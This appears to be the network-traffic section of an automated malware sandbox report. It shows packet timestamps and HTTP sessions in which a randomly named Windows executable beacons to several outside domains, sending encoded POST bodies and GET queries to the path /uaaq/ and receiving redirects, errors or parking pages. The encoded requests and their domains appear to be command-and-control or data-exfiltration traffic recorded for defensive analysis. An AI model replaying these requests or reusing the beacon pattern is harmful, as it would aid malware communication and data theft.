                                                                                    Dec 4, 2023 12:10:10.163456917 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:10.359343052 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:10.359436035 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099560022 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099658966 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099730968 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099797964 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099854946 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099915028 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.099981070 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100035906 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100094080 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100112915 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100198984 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100267887 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100379944 CET804984465.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:11.100435972 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.100608110 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:11.669662952 CET4984480192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.685345888 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.883121967 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:12.883589029 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:12.883680105 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.081331015 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582057953 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582125902 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:13.582561970 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.582748890 CET4984580192.168.11.3065.108.122.245
                                                                                    Dec 4, 2023 12:10:13.780692101 CET804984565.108.122.245192.168.11.30
                                                                                    Dec 4, 2023 12:10:18.590766907 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.768743038 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:18.768992901 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.769345045 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:18.941579103 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.108680964 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.108721972 CET8049846162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:19.109639883 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:20.277091026 CET4984680192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.292718887 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.467494011 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.467788935 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.468019962 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:21.642091990 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774564028 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774633884 CET8049847162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:21.774892092 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:22.979613066 CET4984780192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:23.995203018 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.170097113 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.170469999 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.170696974 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:24.345103025 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483431101 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483561993 CET8049848162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:24.483756065 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:25.682104111 CET4984880192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.697793007 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.874269009 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:26.874521017 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:26.874689102 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.048723936 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177002907 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177083969 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:27.177506924 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.177664042 CET4984980192.168.11.30162.0.222.119
                                                                                    Dec 4, 2023 12:10:27.352539062 CET8049849162.0.222.119192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.180959940 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:32.356997967 CET804985083.229.19.76192.168.11.30
                                                                                    Dec 4, 2023 12:10:32.357254982 CET4985080192.168.11.3083.229.19.76
                                                                                    Dec 4, 2023 12:10:32.357433081 CET4985080192.168.11.3083.229.19.76
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.30 | 49752 | 66.96.162.142 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:03:37.095758915 CET | 430 | OUT | GET /uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA== HTTP/1.1
Host: www.90dayleaderlab.com
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:03:37.208832979 CET | 811 | IN | HTTP/1.1 302 Found
Date: Mon, 04 Dec 2023 11:03:37 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 347
Connection: close
Server: Apache/2
Location: https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==
Cache-Control: max-age=3600
Expires: Mon, 04 Dec 2023 12:03:37 GMT
Age: 0
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.90dayleaderlab.com/uaaq/?XFs82=6R5Xx6907&amp;9pG0L=+hwd8iQl6WZFyEABA14fCozFKvDxgRtGAMGA5XpujhmfuyD+xbLuSxr/3p1qd9/7OnNOS7bQf7l0CX87MYfqK2olkbn4aBNvHA==">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49754 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe

Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:03:52.720055103 CET | 728 | OUT | POST /uaaq/ HTTP/1.1
Host: www.foodpackaging-jobs07.xyz
Accept: */*
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://www.foodpackaging-jobs07.xyz
Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
Cache-Control: no-cache
Connection: close
Content-Length: 186
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/pnMCZs7/qY9rcacYV6u9wekz5ZoknllQw4oXJ7f7vPYI/rUt7fQ3YlDDNjFTsjduzR87Qcrl0NgI5owALZpGm7wLVdCf7Ai0Sa5cgBXSQG0RW42OQHsp5gUc1XCDcr7H9BBI6C7aj59lMXFF4CL4KhGcJ09HXMwZEE672Q==
Dec 4, 2023 12:03:52.902612925 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:52 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.30 | 49755 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:03:55.421380043 CET | 748 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=Tff68lvQbh9/7X8CaLn/7o9qZacYbqu5wfYz5bEKn2BQwaAXbKf7sPYI0LVn1/R7YlG0Ni5TsjJuzQM7Rtrm1dgWyIwGF5pGm7wLVd/47BG0TrJcilLRYm0SV42OC3st5gU61Si5ct/H9ARI6z7Vq59nC3EQxhyRPQ6cOlplJpJyBRWoxo3bc7tQURe14/0HmRpYfig=
Dec 4, 2023 12:03:55.604231119 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:55 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.30 | 49756 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:03:58.123720884 CET | 1665 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.foodpackaging-jobs07.xyz
                                                                                    Referer: http://www.foodpackaging-jobs07.xyz/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:03:58.312223911 CET | 755 | IN | HTTP/1.1 405 Not Allowed
                                                                                    date: Mon, 04 Dec 2023 11:03:58 GMT
                                                                                    content-type: text/html
                                                                                    content-length: 556
                                                                                    server: NginX
                                                                                    connection: close
                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.30 | 49757 | 64.190.62.22 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:04:00.825848103 CET | 436 | OUT | GET /uaaq/?9pG0L=ed3a/Sv+YSNt0BMMWtDh8oRuTPUbBqji39M76aoz6xorlqt/FJu/vPF07bZH/KR6fDXWAwgG8DEezwMWX4bfyuM0xYlQJ9cJ0w==&XFs82=6R5Xx6907 HTTP/1.1
                                                                                    Host: www.foodpackaging-jobs07.xyz
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Dec 4, 2023 12:04:01.012149096 CET | 161 | IN | HTTP/1.1 436
                                                                                    date: Mon, 04 Dec 2023 11:04:00 GMT
                                                                                    content-length: 0
                                                                                    server: NginX
                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.30 | 49758 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:04:06.581212997 CET | 686 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/0hEsF7J1PbUkaJ7cxWKTFIIjGyg2Wpz/WHdluKjBH+9s8cnZz3qJRu03DmE7+crJXWSkQug/l1pazZtHT+Dcc4/VzI5+R3SHTD1q8dXdvxLDokpq/KoM/9XfheBJ9FiMMx2V0kokBSDYjytgFYBz2nm/NR6pjPe2mja5wQ==
Dec 4, 2023 12:04:06.759267092 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.30 | 49759 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:04:09.281474113 CET | 706 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=UtINIE7RxJ4/1BUsWqJ1HbUnG57c+2KXFIMjGz17Wbn/WnNlvIbBG+9s08nc33qSRu5KDjE7+c/JXXikRcI8klpY85t/MuDcc4/VzMQpR3aHT29q+/veiRLM/Upqu6oA/9XHhfcS9GaMMwGV01ojPSDa+isxKoB58FrlJD+/6ML6qW2q3jrhVqIAhtPnL7SQYJJLjDM=
Dec 4, 2023 12:04:09.451107979 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.30 | 49760 | 37.97.254.27 | 80 | 3712 | C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2023 12:04:11.985013962 CET | 1623 | OUT | POST /uaaq/ HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.rocsys.net
                                                                                    Referer: http://www.rocsys.net/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:12.155654907 CET  242  IN  HTTP/1.0 403 Forbidden
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    8  192.168.11.30  49761  37.97.254.27  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:04:14.687134027 CET  422  OUT  GET /uaaq/?XFs82=6R5Xx6907&9pG0L=ZvgtLzuC5J0fwHYuRehKE7pqe+TegS3vAv4ZEylVZ8S9BUo4tJK/O+Yy7erX60uFZvklPnpu2szjI2ePXJ09nWZe2eIrY7ioDA== HTTP/1.1
                                                                                    Host: www.rocsys.net
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Dec 4, 2023 12:04:14.860176086 CET  1340  IN  HTTP/1.1 200 OK
                                                                                    Date: Fri, 28 Apr 2023 12:26:41 GMT
                                                                                    Server: Apache
                                                                                    Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Type: text/html
                                                                                    Cache-Control: max-age=31536000
                                                                                    X-Varnish: 1066511555 3
                                                                                    Age: 19003053
                                                                                    Via: 1.1 varnish (Varnish/6.1)
                                                                                    Accept-Ranges: bytes
                                                                                    Content-Length: 64668
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    9  192.168.11.30  49763  146.148.34.125  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:04:20.455537081 CET  689  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 186
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtrNbkmbRz2o/atpWdc88HbYSdXfN/fhi8QSBcRC1VyTYZ5wsecYKe8OJkUQkGQs/ptyA3nlS3qTzVYTflODbpoE32LWigwVYv6rM8BPhiqkcBR2jMqWMaaVLrqU1WqOWy8lXQ17JU2/OMUsCiYYXOklcYMAshMAt4EN9BA==
                                                                                    Dec 4, 2023 12:04:20.578823090 CET  232  IN  HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:20 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    10  192.168.11.30  49764  146.148.34.125  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:04:23.104180098 CET  709  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 206
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tFi912BdT61WyTYSZxnAsYFe8TqkV8kGQI/pvaA3Q5T4aTLd4Td6eDbpoE32LCMgwdYvK7M/kji9akdEh2jHKW2aaVTrvMPWoGWy91XQk7Kd2/UC0tLtIJ6H3AAYcAumZpt9RhuGwM7YTNGbkuOf5VbsKuUvZo=
                                                                                    Dec 4, 2023 12:04:23.226279974 CET  232  IN  HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:23 GMT
                                                                                    Server: Apache
                                                                                    Location: http://ww11.www.tubidy.tech/
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html


                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                    11  192.168.11.30  49765  146.148.34.125  80  3712  C:\Program Files (x86)\IrtLJIPvhdNHVHkkRAljQjfAkuOgOUNfmQqTQmrHrtlcJRSpmiZJBj\iyGEtqCQDnvMouCuszv.exe
                                                                                    Timestamp  Bytes transferred  Direction  Data
                                                                                    Dec 4, 2023 12:04:25.747078896 CET  1626  OUT  POST /uaaq/ HTTP/1.1
                                                                                    Host: www.tubidy.tech
                                                                                    Accept: */*
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Origin: http://www.tubidy.tech
                                                                                    Referer: http://www.tubidy.tech/uaaq/
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Length: 1122
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                    Data Ascii: 9pG0L=zdjEdAtMZIhmtKdbmHbR42o8QNpWU884HbUSdVzj+tNi9H+Bcy61XyTYb5xkAsYce8KjkUAeGSA/oO6A+CRTvqTLRYTYlOCRpo072LSMgwdYvIzMohPiuKkcBR2VMqX4abxprrQfXZmW88FXWWTKFm/KPUtTtIF5H3d5YcFLmelttGEWXBkyOlJ4dg+VTOh+/aiz5OQC7K/0sAV5RtBm7IwbRnKczfMsKQ2KjY7YSXPdNgk0d1xgh65J90q0XHlh78VNPbqvjzb1bNFhjVKHdtCDRtRd1RQBgPO2zQZO2bI0gplh8aga0Cd3P7oRc/mPKqYj44KD3HP2as7cUDOvz1pamjMOqbI5KUXzi/kNrcbxRqupFSP36ej84ATJ39DXdFXYDBNzKPSE0a6APv6q2ZGIsRsO13Wd3x+U8ucWxo31RYpTpzP1E524d3feFfb0344c9pddOMus46eihjMIVOOq2B4unkLpY5NA0SKFk5KmLryGpLanb55F0E+sqFUvLgxU7fLANu9peyaoxKpNLIyHGpoo91eqV08WadrZ9/U4nTOkL9Qkp494/RGq7gz8vhJpf0Er5dO5v7g1YNAZ0mKuEGXoVlvS79Ol5e4KoLqzVt3E5MOOuwmEHgNGxhLOEBjeUgt3uIJXJxfF7WRQ8xrsROHf4SBEOKuXtnPRwTM7uM0dqbEJJzyiyL5Q0G5QktiZhVwrqUUtOhMfgWfd3sQZY4vBcANGguX1cqSqfy1XyLdZ7XL32T/xZNC9oz0dp8avfQPxF4JU1z7brbzLJbM+KfT60Z4vJ8K2uDeCWgFgAmUX4lFIxlvRsI1bmC7R/6VKfC7IVMrSWOL4BVHmfPqFda5niHekUN890HLmUXP+jHBBlAb9Vk5a3ITVGMa/gRyVbQZKF3lL8zNgJlx5pYQv3VoeN7f8tl81H/65YEQ56zwzinxNxeocxpDLbXVuhDgsBuiH5xjQr9PCLb6nPCtaPny6FKaMOj/EvaTHP52XU4J/ZSpCyLpRaGP12CkgnQubqNaJh0XUXGzXoj66JGHwp23VMV8LeHiHaOCmiVjbMju72qvUSzKKt2pem2wZVVgWcDrT+m7RFTtvbSFmNii+uc30
                                                                                    Dec 4, 2023 12:04:25.870686054 CET  232  IN  HTTP/1.1 302 Found
                                                                                    Date: Mon, 04 Dec 2023 11:04:25 GMT
                                                                                    Server: Apache
